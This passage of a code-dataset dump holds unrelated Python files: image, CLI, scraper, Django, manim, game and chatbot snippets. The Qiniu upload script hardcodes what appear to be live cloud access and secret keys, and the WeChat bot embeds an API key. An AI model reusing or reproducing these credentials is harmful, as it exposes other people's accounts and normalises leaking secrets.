img[:, :, i] = np.uint8(np.floor(255 * col*(1-nanIdx)))\r\n\r\n return img\r\n\r\ndef flow_to_image(flow):\r\n \"\"\"\r\n Convert flow into middlebury color code image\r\n :param flow: optical flow map\r\n :return: optical flow image in middlebury color\r\n \"\"\"\r\n u = flow[:, :, 0]\r\n v = flow[:, :, 1]\r\n\r\n maxu = -999.\r\n maxv = -999.\r\n minu = 999.\r\n minv = 999.\r\n UNKNOWN_FLOW_THRESH = 1e7\r\n SMALLFLOW = 0.0\r\n LARGEFLOW = 1e8\r\n\r\n idxUnknow = (abs(u) > UNKNOWN_FLOW_THRESH) | (abs(v) > UNKNOWN_FLOW_THRESH)\r\n u[idxUnknow] = 0\r\n v[idxUnknow] = 0\r\n\r\n maxu = max(maxu, np.max(u))\r\n minu = min(minu, np.min(u))\r\n\r\n maxv = max(maxv, np.max(v))\r\n minv = min(minv, np.min(v))\r\n\r\n rad = np.sqrt(u ** 2 + v ** 2)\r\n maxrad = max(-1, np.max(rad))\r\n\r\n u = u/(maxrad + np.finfo(float).eps)\r\n v = v/(maxrad + np.finfo(float).eps)\r\n\r\n img = compute_color(u, v)\r\n\r\n idx = np.repeat(idxUnknow[:, :, np.newaxis], 3, axis=2)\r\n img[idx] = 0\r\n\r\n return np.uint8(img)\r\n\r\ndef read_flo(of_path):\r\n f = open(of_path, 'rb')\r\n magic = np.fromfile(f, np.float32, count=1)\r\n if 202021.25 != magic:\r\n print ('Magic number incorrect. Invalid .flo file')\r\n else:\r\n w = np.fromfile(f, np.int32, count=1)[0]\r\n h = np.fromfile(f, np.int32, count=1)[0]\r\n data2d = np.fromfile(f, np.float32, count=2 * w * h)\r\n data2d = np.resize(data2d, (h, w, 2))\r\n f.close()\r\n return data2d\r\n\r\ndef read_of(of_path):\r\n f = open(of_path, 'rb')\r\n magic = np.fromfile(f, np.float32, count=1)\r\n if 202021.25 != magic:\r\n print('Magic number incorrect. Invalid .flo file')\r\n else:\r\n w = np.fromfile(f, np.int32, count=1)[0]\r\n h = np.fromfile(f, np.int32, count=1)[0]\r\n data2d = np.fromfile(f, np.float32, count=2 * w * h)\r\n flow = np.resize(data2d, (h, w, 2))\r\n f.close()\r\n return flow","sub_path":"evaluate/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":10689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"386656234","text":"\nclass A:\n def __init__(self):\n self.var1 = 3\n self.var2 = 6\n\n def multiple(self):\n score = self.var1 * self.var2\n message = \"Wynikiem działania jest liczba %s\" % score\n print(message)\n\nclass B(A):\n\n def multiple(self):\n score = self.var1/self.var2\n super().multiple()\n print(\"Wyżej wywołało się to co nadpisałem w 'score, funkcja 'multiple' klasy 'A' i \"\n \"i ten komentarz który dodałem\")\na = A()\nB().multiple()","sub_path":"dziedziczenie.py","file_name":"dziedziczenie.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"638283944","text":"#!/usr/bin/env python3\n\"\"\"SHAPICLI Client Utility\n\nThis command line utility accesses the REST interface and is suitable\nfor embedding in shell scripts or other devops utilities.\n\nUsage:\n shapi help [ [--examples] ] [--nobold]\n shapi config\n shapi ping [--config=]\n shapi hal [--config=] [] [--props | --post=]\n shapi shell [--config=]\n shapi login [--config=] \n \nOptions:\n --help Show this screen.\n --config= Path to config file\n --examples Display usage examples [default: False]\n --nobold When true, no terminal output will be bolded, useful for piping [default: False]\n\"\"\"\n\nfrom docopt import docopt\nfrom hyperdns.hapi.sysmgr.cli import SHAPICLI\nimport hyperdns.hal.navigator\nimport urllib.error\n\narguments=docopt(__doc__, version='SHAPICLI Client 1.0')\n\n# load all the commands that are documented in the help above\nbase='hyperdns.hapi.sysmgr.cli'\nfor _cmd in arguments.keys():\n if not (_cmd.startswith(\"-\") or _cmd.startswith(\"<\")):\n mod='%s.cli_%s' % (base,_cmd)\n __import__(mod, fromlist=[base])\n \n# now run the SHAPICLI given the command line\ntry:\n SHAPICLI(arguments,docopt_doc=__doc__)\nexcept urllib.error.URLError as E:\n print(\"Sorry, I can not connect to the configured server\")\nexcept SHAPICLI.BadCall as E:\n code=E.response.status_code\n reason=E.response.reason\n print(\"Sorry, I could do not that - (code %s) - %s\" % (code,reason))","sub_path":"hyperdns/hapi/sysmgr/cli/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"645503052","text":"import turtle\n\n# bob = turtle.Turtle()\n# print(bob)\n# turtle.mainloop()\n# bob.fd(100)\n# bob.lt(90)\n# bob.fd(100)\n# bob.lt(90)\n# bob.fd(100)\n# bob.lt(90)\n# bob.fd(100)\n\n# goku = turtle.Turtle()\n# for i in range(10):\n# goku.fd(100)\n# goku.lt(190)\n# goku.fd(200)\n# goku.lt(100)\n\nvegeta = turtle.Turtle()\ndef square(t):\n for i in range(10):\n t.fd(100)\n t.lt(90)\nsquare(vegeta)","sub_path":"aulas/function-turtle.py","file_name":"function-turtle.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"263561746","text":"from datetime import datetime\nimport pickle\nfrom common_function import *\nfrom random import randint\n\ndef start_solution_1(photos_list):\n start = datetime.now()\n order_slide = solution_1(photos_list)\n stop = datetime.now()\n print(\"Run time: {} for input file {}\".format((stop - start), 2))\n return order_slide\n\n\ndef solution_1(photos_list):\n start_image = randint(0, len(photos_list)-1)\n while photos_list[start_image].orientation != \"V\":\n start_image = randint(0, len(photos_list) - 1)\n unhandle_photos = set(range(len(photos_list)))\n curr_index = start_image\n pieces = []\n handled_photos_in_order = []\n count = 0\n vertical_count = 0\n while len(unhandle_photos) != 0 and curr_index != -1:\n count += 1\n if count % 500 == 0:\n print(\"{} - {} - Processing Image Number {}\".format(datetime.now(), count, curr_index))\n\n unhandle_photos.remove(curr_index)\n handled_photos_in_order.append(photos_list[curr_index])\n\n max_score = -1\n max_index = -1\n for i in unhandle_photos:\n if this_image_must_be_vertical(handled_photos_in_order, photos_list[i]):\n continue\n score = scoring(photos_list[curr_index], photos_list[i])\n if score > max_score:\n max_score = score\n max_index = i\n\n curr_index = max_index\n\n for index, p in enumerate(pieces):\n # print(\"Line: {} - {}\".format(index, [str(i) for i in p]))\n print(\"Line: {} - {}\".format(index, [str(i.orientation) for i in p]))\n\n # Saving to pickle file\n # saveToPickle(\"pieces_\" + str(i) + \".pickle\", pieces)\n return handled_photos_in_order\n\n\ndef this_image_must_be_vertical(handled_photo, image):\n count = 0\n for i in reversed(handled_photo):\n if i.orientation == \"H\":\n break\n count += 1\n\n if count % 2 == 1:\n return image.orientation != \"V\"\n else:\n return False\n\n\ndef saveToPickle(fname, var):\n pickle_out = open(fname, \"wb\")\n pickle.dump(var, pickle_out)\n pickle_out.close()\n","sub_path":"solution_1.py","file_name":"solution_1.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"505109609","text":"from datetime import datetime\nfrom bs4 import BeautifulSoup\nfrom bs4.element import Tag\nfrom typing import List\nfrom enum import Enum\n\nimport logging\nimport requests\nimport re\n\nlogging.basicConfig(\n level=logging.DEBUG,\n format=\"[%(asctime)s] %(levelname)-12s|process:%(process)-5s|thread:%(thread)-5s|funcName:%(funcName)s|message:%(message)s\",\n handlers=[\n # logging.FileHandler('fileName.log'),\n logging.StreamHandler()\n ])\n\n\nclass Location:\n def __init__(self, name: str, url: str):\n self.name = name\n self.location_char = url\n\n def __str__(self):\n return f'Location | name:{self.name} location_char:{self.location_char}'\n\n\nclass Locations(Enum):\n MARINA_RISHHA = Location(\n 'Марьина роща', 'm')\n PLOSHHAD_ILICHA = Location(\n 'Площадь Ильича', 'p')\n RIZHSKAJA = Location('Рижская', 'r')\n\n\nclass Destinations(Enum):\n TO_METRO = 'к метро'\n TO_OFFICE = 'в офис'\n\n\nclass LanitBusInfo:\n @staticmethod\n def get_formated_datetime_text() -> str:\n days = [\"понедельник\", \"вторник\", \"среда\",\n \"четверг\", \"пятница\", \"суббота\", \"воскресенье\"]\n current_datetime = datetime.now()\n formated_current_time = f'{str(current_datetime.hour).zfill(2)}:{str(current_datetime.minute).zfill(2)}'\n return f'Сейчас {days[datetime.today().weekday()]} {formated_current_time}'\n\n @staticmethod\n def get_schedule_info(location: Locations) -> dict:\n logging.info('Get schedule info started...')\n response = requests.get(\n f'https://transport.lanit.ru/{location.value.location_char}/table')\n\n current_datetime = datetime.now()\n soup = BeautifulSoup(response.text, 'html.parser')\n tables: List[Tag] = soup.findAll(\"div\", {\"class\": \"col-xs-6\"})\n schedule_data = {}\n for table in tables:\n location_tag: Tag = table.find(\n \"div\", {\"class\": \"row text-center\"})\n destination_text = location_tag.text.strip().lower()\n unparsed_time_data = re.findall('([0-9]{2}:[0-9]{2})', str(table))\n parsed_time_data = []\n for bus_time in unparsed_time_data:\n hour, minute = bus_time.split(':')\n bus_datetime = datetime(year=current_datetime.year,\n month=current_datetime.month,\n day=current_datetime.day,\n hour=int(hour),\n minute=int(minute),\n second=0)\n logging.debug(\n f'bus_datetime {type(bus_datetime)} = {bus_datetime}')\n parsed_time_data.append(bus_datetime)\n schedule_data[Destinations(destination_text)] = parsed_time_data\n\n logging.info(f'schedule_data {type(schedule_data)} = {schedule_data}')\n logging.info('Get schedule info completed')\n return schedule_data\n\n @staticmethod\n def get_nearest_bus(location: Locations, destinations: Destinations) -> str:\n logging.info('Getting nearest bus started...')\n current_datetime = datetime.now()\n formated_current_time = f'{current_datetime.hour}:{current_datetime.minute}'\n if datetime.today().weekday() > 4:\n logging.info('Getting nearest bus completed')\n return f'{LanitBusInfo.get_formated_datetime_text()}. Сегодня маршруток {destinations.value} {location.value.name} не будет.'\n else:\n schedule_data = LanitBusInfo.get_schedule_info(location)\n if len(schedule_data[destinations]) > 0:\n for bus_datetime in schedule_data[destinations]:\n if current_datetime < bus_datetime:\n formated_bus_time = f'{str(bus_datetime.hour).zfill(2)}:{str(bus_datetime.minute).zfill(2)}'\n time_difference = bus_datetime - current_datetime\n time_difference_in_minutes = time_difference.total_seconds() / 60\n logging.info('Getting nearest bus completed')\n return f'{LanitBusInfo.get_formated_datetime_text()}. Ближайшая маршрутка {destinations.value} {location.value.name} будет через {time_difference_in_minutes} минут в {formated_bus_time}'\n logging.info('Getting nearest bus completed')\n return f'{LanitBusInfo.get_formated_datetime_text()}. Сегодня маршруток {destinations.value} {location.value.name} уже не будет.'\n else:\n logging.info('Getting nearest bus completed')\n return f'{LanitBusInfo.get_formated_datetime_text()}. К сожалению не удалось получить расписание маршруток {destinations.value} {location.value.name}.'\n\n\nif __name__ == \"__main__\":\n print(LanitBusInfo.get_nearest_bus(\n Locations.PLOSHHAD_ILICHA, Destinations.TO_METRO))\n print(LanitBusInfo.get_nearest_bus(\n Locations.MARINA_RISHHA, Destinations.TO_OFFICE))\n","sub_path":"schedule_module.py","file_name":"schedule_module.py","file_ext":"py","file_size_in_byte":5250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"269068525","text":"import sys\nlines = sys.stdin.readlines()\nwrite = sys.stdout.write\ndef solve(n):\n\tif n=='0':\n\t\treturn 'INSOMNIA'\n\tseen=set()\n\tn = int(n)\n\tpre = n\n\twhile len(seen)<10:\n\t\ttmpn =str(n)\n\t\tfor i in range(len(tmpn)):\n\t\t\tseen.add(tmpn[i])\n\t\t#print seen\n\t\tn +=pre\n\t\t#print 'n',n\n\treturn n-pre\n\nt = int(lines[0])\nfor i in range(1,t+1):\n\t#print 'lines',lines[i],type(lines[i])\n\tn=lines[i].replace('\\n','')\n\tres = solve(n)\n\tres = str(res)\n\twrite('Case #%d: %s\\n'%(i,res))","sub_path":"codes/CodeJamCrawler/16_0_1/yangrui/coutingSheep.py","file_name":"coutingSheep.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"632605327","text":"# coding=utf-8\n__author__ = 'jemy'\n'''\n本例演示了一个简单的文件上传。\n\n这个例子里面,sdk根据文件的大小选择是Form方式上传还是分片上传。\n'''\nimport qiniu\n\naccessKey = \"qu0jo7KND2N5zJ2Cc3dRkAwZxQx-fXWvgSBxOTn5\"\nsecretKey = \"bSQ0WZVtVWldyZIkqTxa6GmUBhpKu5dUcZ8WEBTE\"\ninit_bucket = \"hzeng\"\n\n\n# 解析结果\ndef parseRet(retData, respInfo):\n if retData != None:\n print(\"Upload file success!\")\n print(\"Hash: \" + retData[\"hash\"])\n print(\"Key: \" + retData[\"key\"])\n\n # 检查扩展参数\n for k, v in retData.items():\n if k[:2] == \"x:\":\n print(k + \":\" + v)\n\n # 检查其他参数\n for k, v in retData.items():\n if k[:2] == \"x:\" or k == \"hash\" or k == \"key\":\n continue\n else:\n print(k + \":\" + str(v))\n else:\n print(\"Upload file failed!\")\n print(\"Error: \" + respInfo.text_body)\n\n\n# 无key上传,http请求中不指定key参数\ndef upload_without_key(filePath, bucket=None):\n # 生成上传凭证\n if not bucket:\n bucket=init_bucket\n auth = qiniu.Auth(accessKey, secretKey)\n upToken = auth.upload_token(bucket, key=None)\n\n # 上传文件\n retData, respInfo = qiniu.put_file(upToken, None, filePath)\n\n # 解析结果\n parseRet(retData, respInfo)\n\ndef upload(filePath,key, bucket=None):\n # 生成上传凭证\n if not bucket:\n bucket=init_bucket\n auth = qiniu.Auth(accessKey, secretKey)\n upToken = auth.upload_token(bucket, key)\n\n # 上传文件\n retData, respInfo = qiniu.put_file(upToken, key, filePath)\n\n # 解析结果\n parseRet(retData, respInfo)\ndef main():\n filePath = \"image/full/photography/30678383/108343336.jpg\"\n upload(filePath,\"full/photography/30678383/108343336.jpg\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"mm_spider/mm_spider/upload_qiniu.py","file_name":"upload_qiniu.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"652246643","text":"# coding: utf-8\n\n\"\"\"\n Bleumi Pay REST API\n\n A simple and powerful REST API to integrate ERC-20, Ethereum, xDai, Algorand payments and/or payouts into your business or application # noqa: E501\n\n OpenAPI spec version: 1.0.0\n Contact: info@bleumi.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\nimport pprint\nimport re # noqa: F401\n\nimport six\nfrom bleumi_pay.models.payment_addresses import PaymentAddresses # noqa: F401,E501\nfrom bleumi_pay.models.payment_balances import PaymentBalances # noqa: F401,E501\n\n\nclass Payment(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'id': 'str',\n 'addresses': 'PaymentAddresses',\n 'balances': 'PaymentBalances',\n 'created_at': 'int',\n 'updated_at': 'int'\n }\n\n attribute_map = {\n 'id': 'id',\n 'addresses': 'addresses',\n 'balances': 'balances',\n 'created_at': 'createdAt',\n 'updated_at': 'updatedAt'\n }\n\n def __init__(self, id=None, addresses=None, balances=None, created_at=None, updated_at=None): # noqa: E501\n \"\"\"Payment - a model defined in Swagger\"\"\" # noqa: E501\n self._id = None\n self._addresses = None\n self._balances = None\n self._created_at = None\n self._updated_at = None\n self.discriminator = None\n self.id = id\n self.addresses = addresses\n self.balances = balances\n self.created_at = created_at\n self.updated_at = updated_at\n\n @property\n def id(self):\n \"\"\"Gets the id of this Payment. # noqa: E501\n\n Unique ID identifying the payment; specified when it was created by your system # noqa: E501\n\n :return: The id of this Payment. # noqa: E501\n :rtype: str\n \"\"\"\n return self._id\n\n @id.setter\n def id(self, id):\n \"\"\"Sets the id of this Payment.\n\n Unique ID identifying the payment; specified when it was created by your system # noqa: E501\n\n :param id: The id of this Payment. # noqa: E501\n :type: str\n \"\"\"\n if id is None:\n raise ValueError(\"Invalid value for `id`, must not be `None`\") # noqa: E501\n\n self._id = id\n\n @property\n def addresses(self):\n \"\"\"Gets the addresses of this Payment. # noqa: E501\n\n\n :return: The addresses of this Payment. # noqa: E501\n :rtype: PaymentAddresses\n \"\"\"\n return self._addresses\n\n @addresses.setter\n def addresses(self, addresses):\n \"\"\"Sets the addresses of this Payment.\n\n\n :param addresses: The addresses of this Payment. # noqa: E501\n :type: PaymentAddresses\n \"\"\"\n if addresses is None:\n raise ValueError(\"Invalid value for `addresses`, must not be `None`\") # noqa: E501\n\n self._addresses = addresses\n\n @property\n def balances(self):\n \"\"\"Gets the balances of this Payment. # noqa: E501\n\n\n :return: The balances of this Payment. # noqa: E501\n :rtype: PaymentBalances\n \"\"\"\n return self._balances\n\n @balances.setter\n def balances(self, balances):\n \"\"\"Sets the balances of this Payment.\n\n\n :param balances: The balances of this Payment. # noqa: E501\n :type: PaymentBalances\n \"\"\"\n if balances is None:\n raise ValueError(\"Invalid value for `balances`, must not be `None`\") # noqa: E501\n\n self._balances = balances\n\n @property\n def created_at(self):\n \"\"\"Gets the created_at of this Payment. # noqa: E501\n\n UNIX timestamp when the payment was created # noqa: E501\n\n :return: The created_at of this Payment. # noqa: E501\n :rtype: int\n \"\"\"\n return self._created_at\n\n @created_at.setter\n def created_at(self, created_at):\n \"\"\"Sets the created_at of this Payment.\n\n UNIX timestamp when the payment was created # noqa: E501\n\n :param created_at: The created_at of this Payment. # noqa: E501\n :type: int\n \"\"\"\n if created_at is None:\n raise ValueError(\"Invalid value for `created_at`, must not be `None`\") # noqa: E501\n\n self._created_at = created_at\n\n @property\n def updated_at(self):\n \"\"\"Gets the updated_at of this Payment. # noqa: E501\n\n UNIX timestamp when the lastest operation was performed # noqa: E501\n\n :return: The updated_at of this Payment. # noqa: E501\n :rtype: int\n \"\"\"\n return self._updated_at\n\n @updated_at.setter\n def updated_at(self, updated_at):\n \"\"\"Sets the updated_at of this Payment.\n\n UNIX timestamp when the lastest operation was performed # noqa: E501\n\n :param updated_at: The updated_at of this Payment. # noqa: E501\n :type: int\n \"\"\"\n if updated_at is None:\n raise ValueError(\"Invalid value for `updated_at`, must not be `None`\") # noqa: E501\n\n self._updated_at = updated_at\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(Payment, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, Payment):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"bleumi_pay/models/payment.py","file_name":"payment.py","file_ext":"py","file_size_in_byte":6815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"646668860","text":"import typing as t\nimport os\n\ndef hello(*, name: str = \"world\"):\n print(f\"hello {name}\")\n\n\ndef byebye(name):\n print(f\"byebye {name}\")\n\n\nif __name__ == \"__main__\":\n pass\n\n\ndef main(argv: t.Optional[t.List[str]] = None) -> t.Any:\n import argparse\n\n parser = argparse.ArgumentParser(formatter_class=type('_HelpFormatter', (argparse.ArgumentDefaultsHelpFormatter, argparse.RawTextHelpFormatter), {}))\n parser.print_usage = parser.print_help # type: ignore\n subparsers = parser.add_subparsers(title='subcommands', dest='subcommand')\n subparsers.required = True\n\n fn = hello\n sub_parser = subparsers.add_parser(fn.__name__, help=fn.__doc__, formatter_class=parser.formatter_class)\n sub_parser.print_usage = sub_parser.print_help # type: ignore\n sub_parser.add_argument('--name', required=False, default='world', help='-')\n sub_parser.set_defaults(subcommand=fn)\n\n fn = byebye # type: ignore\n sub_parser = subparsers.add_parser(fn.__name__, help=fn.__doc__, formatter_class=parser.formatter_class)\n sub_parser.print_usage = sub_parser.print_help # type: ignore\n sub_parser.add_argument('name', help='-')\n sub_parser.set_defaults(subcommand=fn)\n\n args = parser.parse_args(argv)\n params = vars(args).copy()\n action = params.pop('subcommand')\n if bool(os.getenv(\"FAKE_CALL\")):\n from inspect import getcallargs\n from functools import partial\n action = partial(getcallargs, action)\n return action(**params)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"examples/multi-command/04if-name-main/_expose.py","file_name":"_expose.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"53400112","text":"# !/usr/bin/env python\n# -*- coding:utf8 -*-\n\n__author__ = \"Phtaus\"\n__email__ = \"chenqicong@cnnic.cn\"\n__copyright__ = \"Copyright 2016, Niot\"\n__version__ = \"1.0.0\"\n__deprecated__ = False\n__date__ = \"2016-3-30 09:21:01\"\n\nimport os.path\nimport urllib\nimport urllib2\nimport json\n\nfrom ..web.modules import WisagrSysApk\nfrom ..web.lib import EnumStatus\n\ndef app_version(req):\n\t\"\"\"Get the latest app client version\n\tAccording to the version code, query the latest version information to\n\tuser app client.\n\n\treturn:\n\t\tstatus: the sign of result\n\t\t\t\t0 stand from the operated is success\n\t\t\t\t9 stand for the operated is failed\n\t\tversion_info: the information for the latest user app client\n\t\"\"\"\n\n\t# the sql which to query the latest version information\n\tres = EnumStatus()\n\tif 'platform' in req and req['platform'] == 'ios':\n\t\tplatform = req['platform']\n\telse:\n\t\tplatform = 'android'\n\n\tapk_info = WisagrSysApk.get_lastest_ver(platform)\n\n\tif apk_info:\n\t\tif apk_info.version_name is None:\n\t\t\turl = 'https://itunes.apple.com/lookup'\n\t\t\tpara_dict = {'id':'976509986'}\n\t\t\tpara_data = urllib.urlencode(para_dict)\n\t\t\tios_update = urllib2.urlopen(url, para_data)\n\t\t\tresult = json.loads(ios_update.read())\n\t\t\tresults = result['results'][0]\n\t\t\tversion_name = apk_info.version_name = results['version']\n\t\t\tversion_code = apk_info.version_code\n\t\t\tdescription = apk_info.description = results['releaseNotes']\n\t\t\tpath = apk_info.path = results['trackViewUrl']\n\t\t\tapk_info.platform = 'ios'\n\t\t\tmin_compatible_version = apk_info.min_compatible_version\n\t\telse:\n\t\t\t# if platform == 'android':\n\t\t\t# \tpath = os.path.join(os.path.sep, apk_info.path, apk_info.name)\n\t\t\t# else:\n\t\t\tpath = apk_info.path\n\t\t\tversion_code = apk_info.version_code\n\t\t\tdescription = apk_info.description\n\t\t\tmin_compatible_version = apk_info.min_compatible_version\n\t\t\tversion_name = apk_info.version_name\n\n\t\tres.resJson(res.SUCCESS, {\n\t\t\t\"version_code\": version_code,\n\t\t\t\"version_name\": version_name,\n\t\t\t\"version_url\": path,\n\t\t\t\"description\": description,\n\t\t\t\"min_compatible_version\": min_compatible_version\n\t\t})\n\n\treturn res.RES\n","sub_path":"cn/app/system.py","file_name":"system.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"143526376","text":"from big_ol_pile_of_manim_imports import *\r\n\r\nclass diferencia(Scene): \r\n def construct(self): \r\n tit = TextMobject(\"asd\")\r\n tit.scale(.85)\r\n symbol = TextMobject(\"?\")\r\n symbol.scale(.85)\r\n\r\n subt1 = TextMobject(\"Normal\")\r\n subt1.scale(.85)\r\n subt2 = TextMobject(\"Aplicativo\")\r\n subt2.scale(.85)\r\n\r\n tit.to_edge(UP)\r\n subt1.move_to(tit.get_center()+(DOWN*1.5)+(RIGHT*4.5))\r\n subt2.move_to(tit.get_center()+(DOWN*1.5)+(LEFT*4.5))\r\n subt1.set_color(\"#2EFF00\") #VERDE\r\n subt2.set_color(\"#19C4FF\") #AZUL\r\n arrow = DoubleArrow(subt2.get_right(),subt1.get_left(),buff=.1)\r\n symbol.move_to(arrow.get_center())\r\n\r\n self.wait(2)\r\n self.play(Write(subt1),Write(subt2),Write(symbol))\r\n looper = TexMobject(r\"(\\lambda x.(x\\quad x)\\quad \\lambda x.(x\\quad x))\")\r\n looper.scale(.9)\r\n looper.next_to(symbol,DOWN,buff=1.5)\r\n\r\n self.wait(2)\r\n self.play(\r\n Transform(symbol,looper)\r\n )\r\n\r\n self.wait(2)\r\n text1 = TextMobject(\"$loop!$\")\r\n text2 = TextMobject(\"$y$\")\r\n text1.scale(.9)\r\n text2.scale(.9)\r\n text1.next_to(subt2,DOWN,buff=1.5)\r\n text2.next_to(subt1,DOWN,buff=1.5)\r\n text1.set_color(\"#19C4FF\")\r\n text2.set_color(\"#2EFF00\")\r\n self.play(Write(text1))\r\n self.wait(2)\r\n self.play(Write(text2))\r\n self.wait(3)","sub_path":"diferencia.py","file_name":"diferencia.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"541921826","text":"def main(): \n import random\n import time\n from time import sleep\n from random import randint\n \n rn = randint(0, 9)\n \n ui = input(\"What is your name? \")\n sleep(0.1)\n print (\"hi, \"+ ui)\n sleep(0.5)\n print (\"Let's play a game.\")\n sleep(0.1)\n print (\"I'll think of a number between zero and nine, inclusive.\")\n sleep(0.1)\n print (\"Your goal is to guess that number in three attempts.\")\n print (rn)\n sleep(0.4)\n\n msg = [\"Take a guess. \", \"Guess again. \", \"Take another guess. \"]\n\n end = False\n i = 0\n guesses = 0\n while end == False:\n if guesses < 3:\n sleep(0.1)\n ui = input (msg [i])\n i = randint(1, len(msg)-1)\n try:\n ui = int(ui)\n if rn == ui:\n print (\"Correct! Goodbye.\")\n sleep(0.1)\n break\n else:\n if ui < rn:\n print (\"More.\")\n else:\n print (\"Less.\")\n guesses = (guesses + 1)\n except:\n print (\"That's not a valid number.\")\n else:\n print (\"You are out of guesses. goodbye.\")\n exit()\nmain()\n","sub_path":"xyz.py","file_name":"xyz.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"230944944","text":"# Create your views here.\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\n\nfrom wildapp.models import WildApp\nfrom wildapp.serializers import WildAppSerializer\n\n\n@api_view(['GET', 'POST', 'DELETE'])\ndef wp_list(request):\n if request.method == 'GET':\n wps = WildApp.objects.all()\n serializer = WildAppSerializer(wps, many=True)\n return Response(serializer.data)\n if request.method == 'POST':\n serializer = WildAppSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n if request.method == 'DELETE':\n data = WildApp.objects.last()\n data.delete()\n return Response(serializer.data)\n\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['GET'])\ndef wp_selected(request,pk):\n if request.method == 'GET':\n wps = WildApp.objects.filter(species=pk)\n serializer = WildAppSerializer(wps, many=True)\n return Response(serializer.data)\n","sub_path":"wildapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"148873840","text":"import os,sys\nimport pygame\nimport numpy as np\n \nfrom pygame.locals import *\n\nBLACK=(0,0,0)\nWHITE = (255, 255, 255)\n\ndone=False\n\ntry:\n pygame.init()\nexcept:\n print(\"O modulo pygame não foi inicializado/instalado corretamente\")\n\n\n\ndef create_point(surface,list_pos):\n for ii in list_pos:\n print(ii)\n pygame.draw.circle(surface, BLACK, ii , 5)\n\n\nscreen = pygame.display.set_mode((500,500))\npygame.display.set_caption('Boids')\npygame.mouse.set_visible(0)\n\nlist_pos = np.random.randint(400, size=(100,2))\n\nscreen.fill(WHITE)\ncreate_point(screen,list_pos) \npygame.display.flip()\n\nwhile not done:\n for event in pygame.event.get():\n if event.type == QUIT:\n done=True\n\n\n \n","sub_path":"boids.py","file_name":"boids.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"156643604","text":"from wxpy import *\nimport json\nimport requests\n\n\nbot = Bot()\nbot = Bot(cache_path = True)\n\ndef auto_reply(text):\n url = \"http://www.tuling123.com/openapi/api\"\n api_key = \"87f4c0f17b2345febf740b9048c14b34\"\n payload = {\n \"key\": api_key,\n \"info\": text,\n }\n r = requests.post(url, data=json.dumps(payload))\n result = json.loads(r.content)\n return \"[来自,,,,] \" + result[\"text\"]\n \n@bot.register()\ndef forward_message(msg):\n return auto_reply(msg.text)\n\nembed()\n","sub_path":"wxpy.py","file_name":"wxpy.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"591177111","text":"# LABORATORIO\n\n# Tiempo estimado\n\n# 20 minutos\n# Nivel de dificultad\n\n# Media\n# Objetivos\n\n# Familiarizar al estudiante con:\n\n# Utilizar el 